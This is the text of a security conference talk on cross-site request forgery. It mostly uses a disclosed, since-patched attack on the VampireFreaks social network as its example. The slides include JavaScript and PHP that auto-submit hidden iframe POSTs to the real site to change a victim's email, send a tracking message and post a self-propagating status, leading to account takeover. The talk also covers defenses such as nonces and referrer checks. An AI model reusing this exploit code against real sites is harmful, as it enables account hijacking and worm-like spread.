Surf’s Up!
Daniel McCarney (@binaryparadox)The Next HOPE
Exploring Cross Site Request Forgery through social network exploitation.
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
http://binaryparadox.net [email protected]
CSRF?● CSRF → “Sea Surf” → Cross Site Request Forgery
● Self-explanatory name:
– Forcing requests to a site from another
● Open Web Application1 Security Project Top 10
– #5 in 20072
– #5 in 20103
– 3 years and no improvement?● “Prevalence: widespread”3
● “Detectability: easy”3
http://binaryparadox.net [email protected]
Widespread● First BugTraq Posting. CSRF term coined (2001)
– “Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)”4
● Ed Felten, Bill Zeller (2008)
– "Cross-Site Request Forgeries: Exploitation and Prevention"5
– ING Direct, Youtube, MetaFilter, NY Times
● “Sleeping Giant”6
● Very little developer knowledge!
http://binaryparadox.net [email protected]
We <3 CSRF● Easy!
– Web apps are often custom code i.e. likely vulnerable
– Moving back to thin clients & hosted services
● Very different from XSS. Less understood
– XSS and CSRF are complementary
– XSS helps us bypass CSRF protections
● Powerful implications
– If the user can do it, you can force them to do it
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
http://binaryparadox.net [email protected]
Storytime● Imagine a made-up website, community.com
– Has various “members-only” sections
– Written in PHP, beginner to novice developer
● Members are able to post content to different topic threads
– Links, images, styled & formatted text
– Potentially BBCode/Limited Markup?
● Authentication done by Cookie & PHP Session
– HTTP Cookie with a session ID set by login code
● Needs a way to log members out by request
– http://community.com/app/logout.php
http://binaryparadox.net [email protected]
Storytime● Logout script receives a GET from an authenticated member
– Expires cookie, ends session, cleans-up
● Is there a problem?
● A tale of two users: Alice & Mallory
● Mallory posts a crafted image tag to part of a members only community.
– <img src=”http://community.com/app/logout.php” />
– [img]http://community.com/app/logout.php[/img]
http://binaryparadox.net [email protected]
Trouble at Sea
● Alice logs in to community.com
– Session ID stored in a cookie for community.com● Alice browses to Mallory's crafted post
● Image tag is processed by Alice's browser
● GET request sent to http://community.com/app/logout.php to acquire image data
– Cookie is sent along for the ride!
– Why not? It's set for community.com
● Logout script dutifully gives Alice the boot!
http://binaryparadox.net [email protected]
Picture >= 1000 Words
http://binaryparadox.net [email protected]
Picture >= 1000 Words
http://binaryparadox.net [email protected]
Picture >= 1000 Words
http://binaryparadox.net [email protected]
Picture >= 1000 Words
http://binaryparadox.net [email protected]
(Mis)understanding
● A purposefully toy example
● Bad “form” (har har) to logout with a GET request
– GET should be “Idempotent”7 → No side effects
● Potentially misleading – CSRF does not rely on:
– The ability to post content to a target site,
– Image tags or a specific markup language
– A GET based form
http://binaryparadox.net [email protected]
(Mis)understanding● No requirement for content creation rights
– No need for tags/content to be placed on community.com
– Remember the “cross site” aspect?
● Not particular to Image tags
– Lots of tags invoke GET requests automatically
● Further, not limited to GET method forms
– Either social engineer a form POST
– Or use javascript to submit one automatically
http://binaryparadox.net [email protected]
More Complex Flow
http://binaryparadox.net [email protected]
More Complex Flow
http://binaryparadox.net [email protected]
More Complex Flow
http://binaryparadox.net [email protected]
More Complex Flow
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
http://binaryparadox.net [email protected]
VampireFreaks● What is it? → “Gothbook”?● ~1,228,795 members● ~3,000 members online at any given time
● Appeal of social networks:– Easy to embed content → images, CSS, html
– Easy to socially engineer users
– Easy to spread → designed for sharing!
http://binaryparadox.net [email protected]
Disc-lame-er
● Vulnerability (mostly) already patched– Disclosed responsibly
– Never released in the wild
– Wonderful treatment from admins
● Your actions are your own, not mine● Yadda, yadda, yadda
http://binaryparadox.net [email protected]
Attack Flow
● Attack components:– Exploit - located on my server, POST-based
– A tracking account – hit tracking via PM
– Status updates – provide “viral” component
– Social Engineering – luring logged in users to exploit
http://binaryparadox.net [email protected]
Social Engineering
● POST-based exploit means off-site visit required
● Need to lure logged-in users to exploit– Enticing links in Forum Posts/Personal Messages
● Need to hide the true nature of the exploit– BASE64 encoded URL parameter for “decoy”
content
– Main page iframes the content of benign url param
http://binaryparadox.net [email protected]
VF DOMination● Exploit Code:
– Crafted POST requests submitting to VF
– Contained in iframes to conceal responses
– Submitted automatically via javascript
● 3 POSTs:
1) Changes registered e-mail address
2) Sends tracking PM
3) Updates the user's status
http://binaryparadox.net [email protected]
E-mail Switch-a-roo
<form action="" method="post"> <input type="hidden" value="" name="x"> New Email: <input value="" name="new_email" maxlength="100" size="50"> <br><br> <input type="submit" value=" click here to send my validation email to my new email address "></form>
http://binaryparadox.net [email protected]
Tracking PM
<form name="comment_form" onsubmit="submitonce(this)" action="" method="post"> <input type="hidden" value="paradox" name="user"> <input type="hidden" value="124670" name="uid"> <input type="hidden" value="0" name="comment_id"> <input type="hidden" value="0" name="i"> <textarea wrap="soft" rows="13" cols="60" name="comment" id="comment_textarea"></textarea>
... <input type="checkbox" value="1" name="private"> Send To Inbox <input type="checkbox" value="1" id="preview" name="preview">Preview <input type="checkbox" checked="" value="1" name="include_sig">Include Signature ... <input type="submit" onclick="sendUserMessage(this.form, 'paradox'); return false;" value=" submit comment "></form>
http://binaryparadox.net [email protected]
Status Updates
<form method="post" action="/profiles/update_status.php" name="status_form"> <span id="current_status"> <input type="submit" onclick="updateStatus(); return false;" id="spopupgo" value="Go" name="submitstatus"> <textarea onclick="getFocusChangeInput('update status...', this.id);" onblur="loseFocusChangeInput('update status...', this.id);" name="status_input" id="spopuptextarea">update status...</textarea> </span></form>
http://binaryparadox.net [email protected]
Code Sample<script type='text/javascript' language='JavaScript'>function crossDomainPost(writer_url, post_target_url, params){ var url_params = ''; for (var key in params){ url_params =url_params + '&' + key + '='+encodeURIComponent(params[key]); } var url = writer_url + '?post_target_url=' + encodeURIComponent(post_target_url) + url_params; var iframe = document.createElement('iframe'); iframe.setAttribute('src', url); iframe.setAttribute('width', 1); iframe.setAttribute('height', 1); iframe.setAttribute('style', 'border: none;'); var p = document.getElementsByTagName('html'); p[0].appendChild(iframe);}</script>
http://binaryparadox.net [email protected]
Code Sample…
news_link = document.location;crossDomainPost( 'http://binaryparadox.net/vf/form_writer.php', 'http://vampirefreaks.com/serv/ajaxController.php', { action: 'updateStatus', home: '0', status: news_link });</script><?php $target = $_GET['id']; $target = base64_decode($target);?><iframe src="<?php echo $target; ?>" width='100%' height='100%' style="border: none"/>
http://binaryparadox.net [email protected]
Nothing to see here, move along
http://binaryparadox.net [email protected]
Wheels within wheels
http://binaryparadox.net [email protected]
The plot thickens...● With the account e-mail changed, you could
gain the account password– “Forgot my password” feature
– Original account password sent -clear text-
● Victims tracked by the IM sent
● Propagation achieved through status updates pointing back to the exploit page
http://binaryparadox.net [email protected]
BAD BAD BAD BAD!
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
http://binaryparadox.net [email protected]
Halp! – Protection against CSRF
● Referrer checking– All actions on site pass along the page referrer
– App checks referrer that sourced the submit● vampirefreaks.com vs binaryparadox.net
● Effective?– Possibly not foolproof...
– Plugin vulnerabilities (maybe?)
– XSS-paired CSRF? → issues regardless...
http://binaryparadox.net [email protected]
Halp! – Protection against CSRF● Nonce → a difficult to predict key/secret● Should be generated per-request!
– Server writes nonce in hidden param for each form
– Also stores nonce in user's server side session
● Future requests must have the correct nonce● Need XSS to access nonce as attacker
8
http://binaryparadox.net [email protected]
VF E-mail Change 2.0
<form action="" method="post"> <input type="hidden" value="4a39014473ccf63bffdd8d96296b85b8d84f0ef4" name="validate"> <input type="hidden" value="" name="x"> New Email: <input value="" name="new_email" maxlength="100" size="50"> <br><br> <input type="submit" value=" click here to send my validation email to my new email address "></form>
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
http://binaryparadox.net [email protected]
What else?
● Cross Protocol Attacks– Largely the same as CSRF
– Payload form data aimed at a non-HTTP service
● Jochen Topf – 2001– “HTML Form Protocol Attack” 9
– Tricking browsers into sending arbitrary data to specified port
– FTP, SMTP, NNTP, POP3, IMAP, & IRC
– Led to browsers blocking some ports by default10
http://binaryparadox.net [email protected]
For the Lulz● Blacklists are never perfect!
– Ask Goatse Security!
● Firefox XPS IRC Attack11
– Default IRC port not on blocked list
– Reflected IRC spam in the quest for lulz
● Safari XPS Attack12
– Unsigned short overflow in port #
– “Add 65536 to 25 to make 65561”12
– 65561 != 25. Troll on.
http://binaryparadox.net [email protected]
On Obscuring Origin● Think of exploit flow
– User requests bad content
– Bad content forces user to perform an action
● Often difficult to link bad content to action● Attack source is the User● What the User can access, the exploit can
http://binaryparadox.net [email protected]
On Obscuring Origin
● Behind the Wall– Attacks can access Intranet resources
– Networking equipment
– Test servers
– Private systems
● SOHO Routers– Reflash firmware13
– Set DNS Server(s)14
http://binaryparadox.net [email protected]
On Obscuring Origin
http://binaryparadox.net [email protected]
On Obscuring Origin
http://binaryparadox.net [email protected]
On Obscuring Origin
http://binaryparadox.net [email protected]
On Obscuring Origin
http://binaryparadox.net [email protected]
Clickjacking● An evolution of CSRF?● Still forcing authenticated client actions● Bypasses nonce protection: whole page loaded
invisibly● Uses the real forms instead of a cross-site
request (nonce intact)● Hijacks user input to manipulate invis. page
http://binaryparadox.net [email protected]
</presentation>● Hat tip to Ebova, Mreh, Clutch, Temujin, ZanZ● http://friendsofbyron.alteeve.com/
http://binaryparadox.net [email protected]
Resources1 – OWASP – http://owasp.org2 OWASP top 10 2007 http://www.owasp.org/index.php/Top_10_20073 OWASP top 10 2010 http://www.owasp.org/index.php/Top_10_20104 CrossSite Request Forgeries (Re: The Dangers of Allowing Users to Post Images) http://www.tux.org/~peterw/csrf.txt5 "CrossSite Request Forgeries: Exploitation and Prevention" http://from.bz/public/documents/publications/csrf.pdf6 "Sleeping Giant" http://jeremiahgrossman.blogspot.com/2006/09/csrfsleepinggiant.html7 – HTTP Spec http://www.w3.org/Protocols/rfc2616/rfc2616sec9.html8 – Jack Mannino http://twitter.com/jack_mannino
http://binaryparadox.net [email protected]
Resources9 "HTML Form Protocol Attack" http://www.remote.org/jochen/sec/hfpa/hfpa.pdf 10 Mozilla Port Blacklisting http://www.mozilla.org/projects/netlib/PortBanning.html11 Firefox XPS Attack (NSFW) http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack12 Safari XPS Attack (NSFW) http://encyclopediadramatica.com/Safari_XPS_Attack13 – CSRF File Upload http://www.gnucitizen.org/blog/crosssitefileuploadattacks/14 – CSRF BT Router Research http://www.gnucitizen.org/blog/bthomeflubpwninthebthomehub/